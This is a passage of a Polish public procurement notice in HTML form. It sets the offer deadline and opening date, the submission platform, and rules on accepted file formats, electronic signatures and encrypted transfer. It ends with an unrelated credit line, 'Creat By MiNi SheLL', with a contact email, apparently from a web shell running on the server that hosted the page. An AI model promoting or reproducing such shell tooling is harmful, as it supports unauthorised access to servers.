PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać za pośrednictwem Platformy pod adresem:https://amw.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-11 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. sekcji 3.6 Ogłoszenia: 11. Wykonawcy mogą kierować zapytania<br/>doZamawiającego,takżemailowo na adres: dzp.lu@amw.com.pl z dopiskiem: „Postępowanie<br/>nrDZP.OL.2616.23.2022”.Zapytania kierowane na inne adresy mailowe Zamawiającego –<br/>nie będą rozpatrywane. 12.Zamawiający zaleca wczytywanie na Platformę plików<br/>wmaksymalnym rozmiarze do 100 MB.13. Dokumenty przekazywane za pośrednictwemśrodkówkomunikacjielektronicznej w formieelektronicznej są sporządzane, zgodnie z § 2<br/>RozporządzeniaPrezesaRady Ministrów z dnia 30grudnia 2020 r. w sprawie sposobu<br/>sporządzania iprzekazywaniainformacji oraz wymagańtechnicznych dla dokumentów<br/>elektronicznych orazśrodkówkomunikacji elektronicznej wpostępowaniu o udzielenie zamówienia<br/>publicznego lubkonkursie(Dz. U. z 2020 r., poz. 2542) –zwane dalej jako „Rozporządzenie” – w<br/>związku z art. 18ustawy zdnia 17 lutego 2005 r. oinformatyzacji działalności podmiotów<br/>realizujących zadaniapubliczne(Dz. U. z 2020 r., poz.346 z późn. zm.), odsyłającym do<br/>rozporządzenia RadyMinistrów z dnia12 kwietnia 2012 r. wsprawie Krajowych Ram<br/>Interoperacyjności, minimalnychwymagań dlarejestrów publicznych iwymiany informacji w<br/>postaci elektronicznej orazminimalnych wymagańdla systemówteleinformatycznych (tj. Dz. U. z<br/>2017 r., poz. 2247 z późn.zm.) oraz zgodnie zformatamipodpisu elektronicznego określonymi w<br/>tych przepisach prawa – wszczególności wformatach:.pdf, .doc, .docx, .rtf, .odt., .xades, .pades,<br/>.txt, .xls, .xlsx,.zip.Zamawiający zalecaprzesyłanieplików w formacie .pdf.14. Zalecenia<br/>zamawiającegoodnośnie podpisuelektronicznego:a)odnośnie kwalifikowanego podpisu<br/>elektronicznego:• dladokumentów wformacie „pdf” zalecasię podpis w formatem PAdES,•<br/>dokumenty w formacieinnym niż „pdf”zaleca się podpisywaćformatem XAdES.b) odnośnie<br/>podpisu osobistego:• dladokumentów wformacie „pdf” lub „xml”zaleca się podpis wewnętrzny<br/>(otoczony),• dokumenty wformacie innymniż „pdf” zaleca siępodpisywać podpisem zewnętrznym<br/>lub otaczającym.c)odnośnie podpisuzaufanego:• wielkośćdokumentów nie może przekraczać 10<br/>MB (Szczegółoweinformacjedotyczące podpisuzaufanego można uzyskać<br/>podadresem:https://www.gov.pl/web/gov/podpisz-dokumentelektroniczniewykorzystajpodpiszaufany)<br/>Jeżelijest to możliwe, zalecane jest stosowaniepodpisu otaczającego –<br/>wewnętrznego –który polegana tym, że jest zapisany łącznie zpodpisywanym dokumentem<br/>(tworzą jeden plik), anieoddzielnie (plik podpisywany i plikpodpisu).15. Informacja na temat<br/>specyfikacjipołączenia,formatu przesyłanych danych orazkodowania i oznaczania czasu odbioru<br/>danych:1)szyfrowanieza pomocą protokołu TLS;2)formularze dostępne są w formacie HTML<br/>zkodowaniem UTF-8;3)wszelkie operacje opierająsię o czas serwera i dane zapisywane są<br/>zdokładnością co do setnej części sekundy;4) pliki oferty wczytane przez wykonawcę<br/>naPlatformę i zapisane, widoczne sąw Platformie jakozaszyfrowane, możliwość otwarcia<br/>plikówdostępna jest dopiero poodszyfrowaniu przezzamawiającego po upływie terminu<br/>otwarciaofert;5) oznaczenie czasuodbioru danych przezPlatformę stanowi przypiętą do<br/>dokumentuelektronicznego datę orazdokładny czas (hh:mm:ss),znajdującą się po lewej stronie<br/>dokumentuw kolumnie „Dataprzesłania”.<br/>Ogłos<br/>Ogłoszenie nr 2022/BZP 00072319/01 z dnia 2022-03-02<br/>2022-

Creat By MiNi SheLL
Email: jattceo@gmail.com